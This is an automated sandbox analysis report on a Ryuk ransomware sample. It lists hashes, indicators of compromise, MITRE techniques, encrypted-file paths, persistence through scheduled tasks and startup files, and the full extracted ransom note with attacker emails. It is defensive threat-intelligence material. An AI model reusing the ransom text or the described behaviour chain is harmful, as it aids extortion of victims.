ryuk | be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a

Resubmissions

07-11-2022 11:53

221107-n2tpwsedf5 10

07-11-2022 11:00

221107-m36keacfd7 10

Analysis

max time kernel
196s
max time network
218s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
07-11-2022 11:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
Size

885KB
MD5

622bc38dee08e70e91e2be32a58b6d1f
SHA1

7cfec4859fa7ca178095983b3f174f842a44b0c2
SHA256

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a
SHA512

176b6ef6eb7ca308df5418643c9054caa41de726546834aea0e964adbe011a127a3eb440becc32a7d7ff922e48242c73c5abeac0688feec123478597a542692d
SSDEEP

12288:BdJPiMwyM02Jl5YqWYgeWYg955/155/0QebUlAAszsK6Qo1Rn6X:BPiMtklagQKUKRzsK6QmN6

Score

10^/10

ryuk discovery evasion ransomware

Malware Config

Extracted

Path

C:\ProgramData\RyukReadMe.txt

Ransom Note

Your network has been penetrated. All files on each host in the network have been encrypted with a strong algorithm. Backups were either encrypted Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover. We exclusively have decryption software for your situation. More than a year ago, world experts recognized the impossibility of deciphering by any means except the original decoder. No decryption software is available in the public. Antiviruse companies, researchers, IT specialists, and no other persons cant help you decrypt the data. DO NOT RESET OR SHUTDOWN - files may be damaged. DO NOT DELETE readme files. To confirm our honest intentions.Send 2 different random files and you will get it decrypted. It can be from different computers on your network to be sure that one key decrypts everything. 2 files we unlock for free To get info (decrypt your files) contact us at [email protected] or [email protected] You will receive btc address for payment in the reply letter Ryuk No system is safe

Emails

[email protected]

Signatures

Ryuk
Ransomware distributed via existing botnets, often Trickbot or Emotet.
ransomware ryuk
Disables Task Manager via registry modification
evasion

Drops startup file 3 IoCs

Processes:

cmd.exeattrib.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe	attrib.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

2324 icacls.exe

pid	process
2324	icacls.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

description	ioc	process
File opened (read-only)	\??\M:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\O:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Q:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\S:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\E:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\F:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\K:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\L:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\T:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\W:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Y:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\Z:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\P:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\X:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\H:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\I:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\N:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\B:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\G:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\A:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\J:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\R:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\U:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened (read-only)	\??\V:	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Drops file in Program Files directory 64 IoCs

Processes:

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\th.pak.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-print_zh_CN.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main-selector.css.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Regular.otf.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_zh_cn_135x40.svg.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MEDIA\DRUMROLL.WAV.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN092.XML.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.White.png.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\it-it\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-ppd.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-pl.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_Grace-ppd.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7FR.DLL.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\OMRAUT.DLL.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\pa.pak.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.properties.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\WordVL_KMS_Client-ppd.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\japanese_over.png.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\selection-actions2x.png.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LivePersonaCard\images\default\linkedin_logo_small.png.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RICEPAPR\PREVIEW.GIF.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial3-ppd.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\vlc.mo.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART5.BDR.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\ExcelCtxUICellLayoutModel.bin.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\it-it\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_it_135x40.svg.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription3-ppd.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\de-DE\PackageManagementDscUtilities.strings.psd1.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MINSBROAMINGPROXY.DLL.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Ion Boardroom.thmx.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\youtube.luac.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sk-sk\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\MLModels\autofill_labeling_email.ort.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp2-ul-phn.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\it-it\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\tr.pak.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN111.XML.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\root\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_US\List.txt.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3102-0000-1000-0000000FF1CE.xml.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected].[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\Office16\OSPP.HTM.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\en-GB.pak.DATA.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Red.xml.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest5-ppd.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ru-ru\PlayStore_icon.svg.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Templates\Presentation Designs\Maple.gif.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest-pl.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_SubTrial-ppd.xrm-ms.[[email protected]].RYK	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4412 schtasks.exe
1444 schtasks.exe
1604 schtasks.exe
1236 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4288 taskkill.exe
544 taskkill.exe
Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

2876 NOTEPAD.EXE

pid	process
4412	schtasks.exe
1444	schtasks.exe
1604	schtasks.exe
1236	schtasks.exe

pid	process
4288	taskkill.exe
544	taskkill.exe

pid	process
2876	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

pid	process
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe
3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 4288 taskkill.exe
Token: SeDebugPrivilege 544 taskkill.exe

description	pid	process
Token: SeDebugPrivilege	4288	taskkill.exe
Token: SeDebugPrivilege	544	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 3424 wrote to memory of 4696	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4696	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4696 wrote to memory of 1604	4696	cmd.exe	schtasks.exe
PID 4696 wrote to memory of 1604	4696	cmd.exe	schtasks.exe
PID 3424 wrote to memory of 4120	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4120	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 3184	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 3184	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 1012	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 1012	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 1012 wrote to memory of 1236	1012	cmd.exe	schtasks.exe
PID 1012 wrote to memory of 1236	1012	cmd.exe	schtasks.exe
PID 3424 wrote to memory of 1836	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 1836	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 1836 wrote to memory of 2976	1836	cmd.exe	attrib.exe
PID 1836 wrote to memory of 2976	1836	cmd.exe	attrib.exe
PID 3424 wrote to memory of 1796	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 1796	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 1796 wrote to memory of 4412	1796	cmd.exe	schtasks.exe
PID 1796 wrote to memory of 4412	1796	cmd.exe	schtasks.exe
PID 3424 wrote to memory of 4252	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 4252	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 4252 wrote to memory of 1444	4252	cmd.exe	schtasks.exe
PID 4252 wrote to memory of 1444	4252	cmd.exe	schtasks.exe
PID 3424 wrote to memory of 536	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 3424 wrote to memory of 536	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
PID 536 wrote to memory of 1152	536	cmd.exe	attrib.exe
PID 536 wrote to memory of 1152	536	cmd.exe	attrib.exe
PID 3424 wrote to memory of 224	3424	be1b021843326399a29f22897b25162986389905d25102c47a7d7a5853cc315a.exe	cmd.exe
